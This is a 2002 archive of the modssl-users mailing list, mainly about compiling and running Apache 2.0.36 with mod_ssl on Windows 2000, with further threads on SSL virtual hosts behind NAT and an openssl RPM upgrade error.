>We have just spent (wasted) 3 days trying to compile Apache 2.0.36 with
>zlib and mod-ssl on win2k for a critical project and we have been
>unsuccessful. Thus the offer of easy money!
>
>We need working binaries for the config described above URGENTLY and we
>are willing to pay $500 worth of real gold (www.goldmoney.com) to the
>first person who can supply them to us. This gold can be redeemed for
>cash anywhere in the world.
>
>If you want even MORE easy money, we are willing to pay a further $500
>worth of real gold to anyone who can help us to actually compile
>successfully. Details of what we have done and our results are below for
>those who are interested:
>

I'd like to take your money, however, a US citizen should only 
fulfill such an order via snail mail to a physical US address (no PO 
box).

For compiling help, I'd like to take your money for that too, but it 
wouldn't seem right without offering a few tips first. If you then 
feel compelled to pay me for the info, then by all means... :)

I achieved what you want by following the same instructions you read. 
I did a _command-line_ build, using VS.net (60 day trial edition) on 
a new laptop (256mb/DVD) running XP home. Did it on D drive just to 
complicate things a bit. Transferred it to a dev server. Works great.

Install perl.
Unpack the apache source.
Put awk* in the apache source folder and make sure it has been renamed awk.exe
put the openssl source* in the proper place.  -[apache source]\srclib\openssl
put the zlib source* in the proper place. -[apache source]\srclib\zlib
find vcvars32.bat and put a shortcut in your [apache source] and 
[openssl] directories.
open a command prompt.
go to your openssl directory ([apache source]\srclib\openssl) and run 
vcvars32.bat.
run commands to compile openssl*.
you can try a couple of openssl commands at the command prompt to 
verify compilation.
go to your apache source directory (cd \[apache source]) and run vcvars32.bat.
run commands to compile apache via _command-line_*.

* refer to instructions here:


If you get a "can't find this or that" message, put a copy wherever 
you need it.
Look in "Component Services -> Event Viewer" to see other error messages.

There are other issues with using openssl on Windows, but first things first.

HIH,

Steve Parrish
-- 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 06:38:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA11952; Mon, 10 Jun 2002 06:37:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.siddley.net id GAA11920; Mon, 10 Jun 2002 06:36:38 +0200 (MET DST)
Received: from sidd ([])
        by mail.siddley.net (Sendmail 8.12.1/Debian -5) with SMTP id 84E8BA1A
        for ; Mon, 10 Jun 2002 04:36:21 -0000
Message-ID: <005501c21038$5e9c9bd0$0207a8c0@sidd>
From: "John" 
To: 
References: <004301c20f4e$2cb48910$505536d2@odette> 
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Mon, 10 Jun 2002 16:36:20 +1200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello Steve,

Thanks for the offer, we now have binaries, supplied by a non-US person,
but still we have no luck... we can browse to http://localhost, but not
https://localhost.

We have temp certs in place and everything looks fine, but no go.  The
guys working on this have done this 100 times on linux with no problems,
we are now into our 5th day of stuffing around and still no ssl.

Maybe you can give us some pointers? We are using the default configs as
given with apache but there must be something else that needs to be done
to get windows to work with the ssl?

John.


----- Original Message -----
From: "Steve Parrish" 
To: 
Sent: Monday, June 10, 2002 3:31 PM
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money


>Hello list members,
>
>We have just spent (wasted) 3 days trying to compile Apache 2.0.36 with
>zlib and mod-ssl on win2k for a critical project and we have been
>unsuccessful. Thus the offer of easy money!
>
>We need working binaries for the config described above URGENTLY and we
>are willing to pay $500 worth of real gold (www.goldmoney.com) to the
>first person who can supply them to us. This gold can be redeemed for
>cash anywhere in the world.
>
>If you want even MORE easy money, we are willing to pay a further $500
>worth of real gold to anyone who can help us to actually compile
>successfully. Details of what we have done and our results are below
for
>those who are interested:
>

I'd like to take your money, however, a US citizen should only
fulfill such an order via snail mail to a physical US address (no PO
box).

For compiling help, I'd like to take your money for that too, but it
wouldn't seem right without offering a few tips first. If you then
feel compelled to pay me for the info, then by all means... :)

I achieved what you want by following the same instructions you read.
I did a _command-line_ build, using VS.net (60 day trial edition) on
a new laptop (256mb/DVD) running XP home. Did it on D drive just to
complicate things a bit. Transferred it to a dev server. Works great.

Install perl.
Unpack the apache source.
Put awk* in the apache source folder and make sure it has been renamed
awk.exe
put the openssl source* in the proper place.  -[apache
source]\srclib\openssl
put the zlib source* in the proper place. -[apache source]\srclib\zlib
find vcvars32.bat and put a shortcut in your [apache source] and
[openssl] directories.
open a command prompt.
go to your openssl directory ([apache source]\srclib\openssl) and run
vcvars32.bat.
run commands to compile openssl*.
you can try a couple of openssl commands at the command prompt to
verify compilation.
go to your apache source directory (cd \[apache source]) and run
vcvars32.bat.
run commands to compile apache via _command-line_*.

* refer to instructions here:


If you get a "can't find this or that" message, put a copy wherever
you need it.
Look in "Component Services -> Event Viewer" to see other error
messages.

There are other issues with using openssl on Windows, but first things
first.

HIH,

Steve Parrish
--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 07:19:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA13934; Mon, 10 Jun 2002 07:18:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivivos.com id HAA13888; Mon, 10 Jun 2002 07:17:41 +0200 (MET DST)
Received: from elusion [66.57.168.62] by ivivos.com with ESMTP
  (SMTPD32-7.07) id A69F5E40060; Mon, 10 Jun 2002 01:18:23 -0400
From: "Chris Hsiang" 
To: 
Subject: RE: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Mon, 10 Jun 2002 01:18:23 -0400
Message-ID: <000001c2103e$3e580d90$0100a8c0@ivivos.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <005501c21038$5e9c9bd0$0207a8c0@sidd>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Hsiang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am using win32 of Apache 2.0.35/2.0.36 and I had many problems in the
beginning.  It took me a week to get it work.

First can you show me your config now?  Please do an attachement
Are you able to start apache with modssl but not yet have any virtual
host that with a sslengine on.

It is very hard to troubleshoot the situation with very limited
information and which point that modssl didn't work for you


Chris Hsiang
Intervivos LLC


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of John
Sent: Monday, June 10, 2002 12:36 AM
To: modssl-users@modssl.org
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money

Hello Steve,

Thanks for the offer, we now have binaries, supplied by a non-US person,
but still we have no luck... we can browse to http://localhost, but not
https://localhost.

We have temp certs in place and everything looks fine, but no go.  The
guys working on this have done this 100 times on linux with no problems,
we are now into our 5th day of stuffing around and still no ssl.

Maybe you can give us some pointers? We are using the default configs as
given with apache but there must be something else that needs to be done
to get windows to work with the ssl?

John.


----- Original Message -----
From: "Steve Parrish" 
To: 
Sent: Monday, June 10, 2002 3:31 PM
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money


>Hello list members,
>
>We have just spent (wasted) 3 days trying to compile Apache 2.0.36 with
>zlib and mod-ssl on win2k for a critical project and we have been
>unsuccessful. Thus the offer of easy money!
>
>We need working binaries for the config described above URGENTLY and we
>are willing to pay $500 worth of real gold (www.goldmoney.com) to the
>first person who can supply them to us. This gold can be redeemed for
>cash anywhere in the world.
>
>If you want even MORE easy money, we are willing to pay a further $500
>worth of real gold to anyone who can help us to actually compile
>successfully. Details of what we have done and our results are below
for
>those who are interested:
>

I'd like to take your money, however, a US citizen should only
fulfill such an order via snail mail to a physical US address (no PO
box).

For compiling help, I'd like to take your money for that too, but it
wouldn't seem right without offering a few tips first. If you then
feel compelled to pay me for the info, then by all means... :)

I achieved what you want by following the same instructions you read.
I did a _command-line_ build, using VS.net (60 day trial edition) on
a new laptop (256mb/DVD) running XP home. Did it on D drive just to
complicate things a bit. Transferred it to a dev server. Works great.

Install perl.
Unpack the apache source.
Put awk* in the apache source folder and make sure it has been renamed
awk.exe
put the openssl source* in the proper place.  -[apache
source]\srclib\openssl
put the zlib source* in the proper place. -[apache source]\srclib\zlib
find vcvars32.bat and put a shortcut in your [apache source] and
[openssl] directories.
open a command prompt.
go to your openssl directory ([apache source]\srclib\openssl) and run
vcvars32.bat.
run commands to compile openssl*.
you can try a couple of openssl commands at the command prompt to
verify compilation.
go to your apache source directory (cd \[apache source]) and run
vcvars32.bat.
run commands to compile apache via _command-line_*.

* refer to instructions here:


If you get a "can't find this or that" message, put a copy wherever
you need it.
Look in "Component Services -> Event Viewer" to see other error
messages.

There are other issues with using openssl on Windows, but first things
first.

HIH,

Steve Parrish
--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 07:22:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA14126; Mon, 10 Jun 2002 07:21:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.siddley.net id HAA14084; Mon, 10 Jun 2002 07:20:32 +0200 (MET DST)
Received: from sidd ([])
        by mail.siddley.net (Sendmail 8.12.1/Debian -5) with SMTP id 84E8BA1A
        for ; Mon, 10 Jun 2002 05:20:21 -0000
Message-ID: <006f01c2103e$84067e30$0207a8c0@sidd>
From: "John" 
To: 
References: <004301c20f4e$2cb48910$505536d2@odette> 
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Mon, 10 Jun 2002 17:20:20 +1200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We have discovered that if we start Apache from the console with
>apache -D SSL on our windows server, then we have ssl support...
Please, someone, how do we get ssl support running as a service?

It seems we have wasted a couple of days, simply to find this out!

John.




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 09:14:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19573; Mon, 10 Jun 2002 09:13:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id JAA19487; Mon, 10 Jun 2002 09:12:53 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 10 Jun 2002 00:11:47 -0700
Received: from 203.125.80.76 by lw3fd.law3.hotmail.msn.com with HTTP;
	Mon, 10 Jun 2002 07:11:47 GMT
X-Originating-IP: [203.125.80.76]
From: "Mark Chew" 
To: modssl-users@modssl.org
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Mon, 10 Jun 2002 07:11:47 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 10 Jun 2002 07:11:47.0960 (UTC) FILETIME=[15D57780:01C2104E]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mark Chew" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Assuming the win2k service for Apache is created
(else create one using sc command),
try configure the Apache service properties like this :

Path to executable:
"C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice

Startup type:
Automatic



Regards,
Mark


>From: "John" 
>Reply-To: modssl-users@modssl.org
>To: 
>Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
>Date: Mon, 10 Jun 2002 17:20:20 +1200
>
>We have discovered that if we start Apache from the console with
> >apache -D SSL on our windows server, then we have ssl support...
>Please, someone, how do we get ssl support running as a service?
>
>It seems we have wasted a couple of days, simply to find this out!
>
>John.
>
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org




_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 11:07:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA25283; Mon, 10 Jun 2002 11:04:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from MAIL2.trans-it.de id LAA25199; Mon, 10 Jun 2002 11:03:09 +0200 (MET DST)
Received: from [193.96.197.36] by MAIL2.ntmail.trans-it.net (NTMail 7.00.0018/LG0061.00.9518a920) with ESMTP id uyzylbaa for modssl-users@modssl.org; Mon, 10 Jun 2002 11:01:29 +0200
From: "Andre Steffens" 
To: 
Subject: AW: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Mon, 10 Jun 2002 11:03:29 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <005501c21038$5e9c9bd0$0207a8c0@sidd>
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Steffens" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello List,

I'm also searching for an Win2k binary with SSL support. But it's not
possible for me to spend $500 for this. I would be very grateful if someone
can help me without money...

Thx
Andre

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 11:08:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA25509; Mon, 10 Jun 2002 11:07:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA25256; Mon, 10 Jun 2002 11:04:22 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C92B14CE79B; Mon, 10 Jun 2002 11:04:19 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 5ECD728704; Mon, 10 Jun 2002 10:53:36 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from tuzidesign.com id FAA06659; Mon, 10 Jun 2002 05:03:36 +0200 (MET DST)
Received: (qmail 24225 invoked by alias); 10 Jun 2002 03:03:34 -0000
Received: (qmail 24217 invoked from network); 10 Jun 2002 03:03:34 -0000
Received: from samson.tuzidesign.com (HELO tuzi.com) (192.168.168.4)
  by shamgar.tuzidesign.com with SMTP; 10 Jun 2002 03:03:34 -0000
Message-ID: <3D041706.C39A84D5@tuzi.com>
Date: Sun, 09 Jun 2002 23:03:34 -0400
From: "Michael R. Tuzi" 
X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.9-31 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Multiple sites using different IP's
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael R. Tuzi" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have read many posts about the inability to use virtual host names with ssl. My firewall uses NAT, and only allows one LAN IP to receive requests for httpd on ports 80 and 443. Given that I can have multiple IP's on one NIC (i'm running Redhat Linux 7.2) and that I can setup my internal DNS (which the firewall uses) such that:

SITE		IP
-----------------------
www.site1.org	192.168.0.1
www.site2.com	192.168.0.2
www.site3.net	192.168.0.3
...

And putting the following in my httpd.conf:

NameVirtualHost 192.168.0.1:80
NameVirtualHost 192.168.0.1:443
NameVirtualHost 192.168.0.2:80
NameVirtualHost 192.168.0.2:443


    ServerName www.site1.org
    ...



    ServerName www.site1.org
    ...
    SSLCertificateFile ...
    SSLCertificateKeyFile ...



    ServerName www.site2.com
    ...



    ServerName www.site2.com
    ...
    SSLCertificateFile ...
    SSLCertificateKeyFile ...


Assuming that the firewall sends httpd requests to 192.168.0.1, is it possible for apache to be configured to handle requests made to www.site2.com/192.168.0.2? Or can I accomplish what I desire by using some sort of proxy that receives all httpd requests from the firewall and then connects to my apache server.

I guess my bottom line question is - can I use internal IP addresses to use multiple ssl-enabled virtual hosts, and if so, how?

Regards,

Michael
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 11:34:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA28314; Mon, 10 Jun 2002 11:33:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA28263; Mon, 10 Jun 2002 11:32:21 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g5A9Vw031128
	for ; Mon, 10 Jun 2002 10:32:03 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 10 Jun 2002 10:31:55 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F020671A0@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: RHL7.0 with openssl0.9.5a & 0.9.6
Date: Mon, 10 Jun 2002 10:31:52 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Why did you forcibly install and upgrade the packages? Were there error
messages without it?

The ONLY time I'd ever forcibly install a package is if it was already
installed according to the RPM database but files were damaged. This is
because certain packages (eg openssl) cannot be removed and reinstalled
because of the number of dependencies on them.

Likewise, I'd never use no-deps without a really really good reason.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If Charles Darwin knew a fraction of what scientists know today, he'd never
have written the Origin of the Species.


> -----Original Message-----
> From: ben@foundmoney.com [mailto:ben@foundmoney.com]
> Sent: 07 June 2002 20:10
> To: modssl-users@modssl.org
> Subject: RHL7.0 with openssl0.9.5a & 0.9.6
> 
> 
> I just upgraded my openssl and the sent a SIGHUP to httpd and 
> I got the 
> following error:
> 
> Syntax error on line 265 of /etc/httpd/conf/httpd.conf:
> Cannot load /etc/httpd/modules/libssl.so into server: symbol 
> __sysconf, 
> version GLIBC_2.2 not defined in file libc.so.6 with link 
> time reference
> 
> The system is running RHL7.0. Before upgrade everything was 
> working fine 
> (including SSL module). We had openssl-0.9.5a-14 installed.
> 
> Then for upgrade I performed the following:
> rpm -ivh --force openssl095a-0.9.5a-9.i386.rpm
> rpm -Uvh --force openssl-0.9.6-9.i386.rpm
> 
> (for your info: openssl095a is the same as openssl-0.9.5a 
> just different 
> names, they include the same files so you can have both 
> 0.9.5a and 0.9.6 
> installed at the same time. it's an RPM versioning issue)
> 
> So in the /usr/lib directory there is libssl.so.0 and 
> libssl.so.1 (this is 
> compatibility for other programs). But now on restart of 
> httpd I received the 
> following error.
> 
> Anybody have ideas?
> 
> Thanks,
> Ben
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 12:59:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA04416; Mon, 10 Jun 2002 12:58:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.siddley.net id MAA04380; Mon, 10 Jun 2002 12:57:37 +0200 (MET DST)
Received: from odette ([])
        by mail.siddley.net (Sendmail 8.12.1/Debian -5) with SMTP id 84E8BA1A
        for ; Mon, 10 Jun 2002 10:57:17 -0000
Message-ID: <003701c2106e$374d6060$516436d2@odette>
From: "John" 
To: 
References: 
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Mon, 10 Jun 2002 23:01:29 +1200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks everyone, we now have everything working fine.

A quick howto for beginners (who perhaps experience what we have
experienced):

If you want win2k + mod-ssl, don't trust the apache HOWTO at
http://httpd.apache.org/docs-2.0/platform/win_compiling.html, they may
be fine for those who don't need ssl (and those people can simply use
the supplied binaries) but they are wrong if you need ssl.

Firstly, don't use the perl examples given on apache.org to prepare and
compile openssl, use the instructions in INSTALL.W32 that comes with the
openSSL source.

We eventually found that with visual C++ 6 we could compile apache
without ssl fine. Later we compiled mod-ssl alone (also in VC++) and
moved the mod-ssl.so binary to the modules folder in the apache
installation.

And that's it, except you need to know how to start Apache in "ssl
mode".

from the console in the apache\bin use

>apache -D SSL

to install apache to run as a service with SSL

>apache -i -D SSL

Hope this helps someone out there, and thanks to everyone who helped us!

John.





----- Original Message -----
From: "Mark Chew" 
To: 
Sent: Monday, June 10, 2002 7:11 PM
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money


: Assuming the win2k service for Apache is created
: (else create one using sc command),
: try configure the Apache service properties like this :
:
: Path to executable:
: "C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice
:
: Startup type:
: Automatic
:
:
:
: Regards,
: Mark
:
:
: >From: "John" 
: >Reply-To: modssl-users@modssl.org
: >To: 
: >Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
: >Date: Mon, 10 Jun 2002 17:20:20 +1200
: >
: >We have discovered that if we start Apache from the console with
: > >apache -D SSL on our windows server, then we have ssl support...
: >Please, someone, how do we get ssl support running as a service?
: >
: >It seems we have wasted a couple of days, simply to find this out!
: >
: >John.
: >
: >
: >
: >
:
>______________________________________________________________________
: >Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
: >User Support Mailing List
modssl-users@modssl.org
: >Automated List Manager
majordomo@modssl.org
:
:
:
:
: _________________________________________________________________
: Chat with friends online, try MSN Messenger: http://messenger.msn.com
:
: ______________________________________________________________________
: Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
: User Support Mailing List                      modssl-users@modssl.org
: Automated List Manager                            majordomo@modssl.org
:

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 16:18:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA15208; Mon, 10 Jun 2002 16:17:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id QAA15177; Mon, 10 Jun 2002 16:16:19 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id ; Mon, 10 Jun 2002 07:16:11 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1FD5@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: RE: Multiple sites using different IP's
Date: Mon, 10 Jun 2002 07:16:01 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Michael,
Here is how I've done this.

external dns
SITE		IP
-----------------------
www.site1.org	external IP.A to NAT for 192.168.0.1 
www.site2.com	external IP.B to NAT for 192.168.0.2


my Firewall/NAT device translates 
external IP.A ---> 192.168.0.1
external IP.B ---> 192.168.0.2


on the Multihomed RH Linux server (I'm not using internal dns)
/etc/hosts 
www.site1.org	192.168.0.1
www.site2.com	192.168.0.2

Apache Httpd.conf
NameVirtualHost 192.168.0.1:80
NameVirtualHost 192.168.0.1:443
NameVirtualHost 192.168.0.2:80
NameVirtualHost 192.168.0.2:443


    ServerName www.site1.org
    ...



    ServerName www.site1.org
    ...
    SSLCertificateFile ... 
    SSLCertificateKeyFile ... 



    ServerName www.site2.com
    ...



    ServerName www.site2.com
    ...
    SSLCertificateFile ... 
    SSLCertificateKeyFile ... 


I think that your answer depends on the abilities of your firewall/NAT
device.

As I understand things, Apache must use the inbound IP address to determine
which certificate is needed to decrypt the request. If your Firewall can
only perform https inbound port mapping to 1 IP address, then I don't see
how you would solve this problem. Even with a proxy, you would not know
which certificate to use for decrypting the message, thus you could not
determine if the traffic was for www.site1.com or www.site2.com. 

You should look at your firewall documentation. There may be some
combination of port mapping and "direct-1-to-1" mapping that would let you
do this. Perhaps your firewall support "direct-1-to-1" mapping all traffic
on IP.A to 192.168.0.1. Then you could use the port mapping feature to
direct ports 80 and 443 on IP.B to 192.168.0.2. 

Alternatively, perhaps your firewall has a DMZ feature. Maybe you could
connect IP.A/192.168.0.1 to the Firewall port mapping feature and the DMZ
feature to direct IP.B to 192.168.1.2 on the DMZ network. I've used
192.168.1.2 instead of 192.168.0.2, because usually a DMZ feature is a
different Interface on the Firewall device.

Hope this helps,
David Marshall



-----Original Message-----
From: Michael R. Tuzi [mailto:michael@tuzi.com]
Sent: Sunday, June 09, 2002 8:04 PM
To: modssl-users@modssl.org
Subject: Multiple sites using different IP's


I have read many posts about the inability to use virtual host names with
ssl. My firewall uses NAT, and only allows one LAN IP to receive requests
for httpd on ports 80 and 443. Given that I can have multiple IP's on one
NIC (i'm running Redhat Linux 7.2) and that I can setup my internal DNS
(which the firewall uses) such that:

SITE		IP
-----------------------
www.site1.org	192.168.0.1
www.site2.com	192.168.0.2
www.site3.net	192.168.0.3
...

And putting the following in my httpd.conf:

NameVirtualHost 192.168.0.1:80
NameVirtualHost 192.168.0.1:443
NameVirtualHost 192.168.0.2:80
NameVirtualHost 192.168.0.2:443


    ServerName www.site1.org
    ...



    ServerName www.site1.org
    ...
    SSLCertificateFile ...
    SSLCertificateKeyFile ...



    ServerName www.site2.com
